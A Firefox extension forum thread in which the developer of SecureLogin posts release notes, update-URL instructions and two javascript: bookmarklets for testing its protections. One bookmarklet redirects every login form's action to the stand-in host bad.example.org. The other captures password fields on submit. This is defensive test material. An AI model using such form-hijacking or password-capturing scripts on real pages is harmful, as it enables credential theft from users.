[Ext] Opera Wand for Firefox - SecureLogin
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
I thought about implementing a keyboard shortcut setting and halfway implemented it but didn't finish for these reasons:
- ALT+N isn't used yet according to http://kb.mozillazine.org/Keyboard_shor ... s_(Firefox)
- ALT+N can be performed with one hand
- most people don't bother about changing the hotkey
- There exists a keyboard shortcut extension, which can configure SecureLogin's shortcut as well => http://www.extensionsmirror.nl/index.php?showtopic=254
- The SecureLogin keyboard shorcut can be configured manually by changing the language files
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
I added a "Custom Update URL" as it can take a while until SecureLogin will be listet at addons.mozilla.org.
This way, you can update SecureLogin automatically.
To enable the auto-update without having to install the new version manually, you can do the following:
Close Firefox.
Open the following directory:
--> [YOUR FIREFOX PROFILE]/extensions/secureLogin@blueimp.net/
Open the contained "install.rdf" with a texteditor that can handle UNIX line feeds (\n).
Add the following line just behind the "optionsURL":
Important: Instead of just "em" you have to use the tags "em:updateURL".
phpBB doesn't allow them to display properly.
Better explanation:
The entry must look like the examples described on http://developer.mozilla.org/en/docs/in ... #updateURL just with the url I provide:
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%
After doing that, the update to version 0.4.1 should be available.
As an alternative, just install the new version 0.4.1 manually, which includes the updateURL.
This way, you can update SecureLogin automatically.
To enable the auto-update without having to install the new version manually, you can do the following:
Close Firefox.
Open the following directory:
--> [YOUR FIREFOX PROFILE]/extensions/secureLogin@blueimp.net/
Open the contained "install.rdf" with a texteditor that can handle UNIX line feeds (\n).
Add the following line just behind the "optionsURL":
Code: Select all
<em>https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%</em>
Important: Instead of just "em" you have to use the tags "em:updateURL".
phpBB doesn't allow them to display properly.
Better explanation:
The entry must look like the examples described on http://developer.mozilla.org/en/docs/in ... #updateURL just with the url I provide:
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%
After doing that, the update to version 0.4.1 should be available.
As an alternative, just install the new version 0.4.1 manually, which includes the updateURL.
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
Version 0.5.2 released with new features:
- Warning if changing second level domain on login
- List of exceptions for websites which do not work with the "JavaScript protection on login" option
- Extended statusbar icon context menu with shortcuts to saved passwords, "remember passwords rejection list" and SecureLogin settings
- Warning if changing second level domain on login
- List of exceptions for websites which do not work with the "JavaScript protection on login" option
- Extended statusbar icon context menu with shortcuts to saved passwords, "remember passwords rejection list" and SecureLogin settings
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
If you input and run the following JavaScript code in your location bar, after loading a page for which you saved passwords, you can test one of the security enhancements of the SecureLogin-extension:
SecureLogin will ask you on login if you really want to login to bad.example.org. You are then able to stop the login and prevent sending your credentials to bad.example.org.
The icons tooltip show the changed login url as well.
Code: Select all
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();
SecureLogin will ask you on login if you really want to login to bad.example.org. You are then able to stop the login and prevent sending your credentials to bad.example.org.
The icons tooltip show the changed login url as well.
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
Another test, this time to demonstrate the optional "JavaScript protection on login":
Just input the following JavaScript code in your location bar and run it after loading a login page for which you saved your password before:
Without active "JavaScript protection" your password will be displayed in a warning box (alert) on login.
If you enable the setting, this won't happen.
Therefore, I recommend you to activate the option "JavaScript protection on login" and add websites that don't work to the exception list.
Just input the following JavaScript code in your location bar and run it after loading a login page for which you saved your password before:
Code: Select all
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();
Without active "JavaScript protection" your password will be displayed in a warning box (alert) on login.
If you enable the setting, this won't happen.
Therefore, I recommend you to activate the option "JavaScript protection on login" and add websites that don't work to the exception list.
-
- Posts: 32
- Joined: May 4th, 2004, 1:16 pm
- Location: Macedonia
- Contact:
- jimfitter
- Folder@Home
- Posts: 5225
- Joined: January 28th, 2005, 11:17 am
- Location: Chicagoland area
- Contact:
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
- Uncle Spellbinder
- Posts: 3519
- Joined: May 28th, 2004, 4:52 pm
- Location: Highland, IN - U.S.A.
- Contact:
I can't say enough about SecureLogin. This has turned into one of my "must have" extensions for Firefox. I'd like to see the devs incorporate this into Firefox.
My Firefox Add-Ons Collection: Firefox Essentials
-
- Posts: 32
- Joined: May 4th, 2004, 1:16 pm
- Location: Macedonia
- Contact:
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
-
- Posts: 524
- Joined: January 31st, 2007, 12:23 pm
- Contact:
Version 0.5.4 released:
- Secure Login now uses the saved userFieldName and passwordFieldName rather than searching for related fields in the form elements list.
Apart from that, the Secure Login project page has been redesigned for better accessibility and a better look.
The built-in Password Manager auto-fill feature has been improved as stated on Mozilla Foundation Security Advisory 2007-02:
In my opinion, auto-filling user+pass is still not secure as requiring a user action as is done with Secure Login.
Unfortunately, the newly saved form destination url seems not accessible for extension developers so far (no property additional property), as I would have liked to include this check as well.
But the Secure Login option to ask for confirmation on domain change adds protection in a similar way.
- Secure Login now uses the saved userFieldName and passwordFieldName rather than searching for related fields in the form elements list.
Apart from that, the Secure Login project page has been redesigned for better accessibility and a better look.
The built-in Password Manager auto-fill feature has been improved as stated on Mozilla Foundation Security Advisory 2007-02:
The Firefox password manager was altered to take into account the destination site of the password data and only replay when a form's destination matches the one that was saved. This does not protect users if an attacker was able to inject script into the site in addition to form controls as the injected script could listen in on anything the user does.
In my opinion, auto-filling user+pass is still not secure as requiring a user action as is done with Secure Login.
Unfortunately, the newly saved form destination url seems not accessible for extension developers so far (no property additional property), as I would have liked to include this check as well.
But the Secure Login option to ask for confirmation on domain change adds protection in a similar way.